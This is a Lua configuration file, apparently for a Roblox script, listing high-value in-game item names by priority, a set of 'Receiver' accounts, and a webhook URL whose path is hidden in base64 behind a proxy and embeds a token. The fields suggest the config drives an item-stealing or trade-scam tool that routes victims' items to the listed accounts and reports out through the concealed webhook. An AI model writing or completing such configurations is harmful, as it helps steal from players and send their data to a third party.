-- 🔗 Shared Config (by PhatLee)
local config = {}

config.PRICE_LIMIT = 1
config.WEBHOOK = "https://proxy-roan-sigma.vercel.app/YXBpL3dlYmhvb2tzLzE0MzAxODI1MzY3NzIwNjMzMDUvN2xkSkdBalBvR1VtdmtyVlRTWUhHa1JDNzZ0UGc3VHB2Zks3RXJ4QUsxekxxLU1IWWxJUnRXZ01oaHJzVWF6RzZwNks="

config.targetNames = {
    {name = "Strawberry Elephant", priority = 1},
    {name = "Meowl", priority = 2},
    {name = "Dragon Cannelloni", priority = 3},
    {name = "Spooky and Pumky", priority = 4},
    {name = "Spaghetti Tualetti", priority = 5},
    {name = "La Secret Combinasion", priority = 6},
    {name = "La Supreme Combinasion", priority = 7},
    {name = "La Spooky Combinasion", priority = 8},
    {name = "Ketupat Kepat", priority = 9},
    {name = "Garama and Madundung", priority = 10},
    {name = "Secret Lucky Block", priority = 11},
    {name = "Ketchuru and Musturu", priority = 12},
    {name = "Los Lucky Blocks", priority = 13},
    {name = "Los Hotspotsitos", priority = 14},
    {name = "Los Bros", priority = 15},
    {name = "Los Nooo My Hotspotsitos", priority = 16},
    {name = "Nooo My Hotspot", priority = 17},
    {name = "Nuclearo Dinossauro", priority = 18},
    {name = "La Grande Combinasion", priority = 19},
    {name = "Los Combinasionas", priority = 20},
    {name = "Tacorita Bicicleta", priority = 21},
    {name = "Esok Sekolah", priority = 22},
    {name = "Admin Lucky Block", priority = 23},
    {name = "Taco Lucky Block", priority = 24},
    {name = "67", priority = 25},
}

config.Displayname = { "Sweet", "phatle8117", "A", "B" }
config.Receiver = { "phatle8117", "ConCuTiHon02", "candyblossom1243", "bomaylatip", "banpetuytin1111", "banpetuytin11114", "banpetuytin11115", "banpetuytin111140", "phatle912" }
return config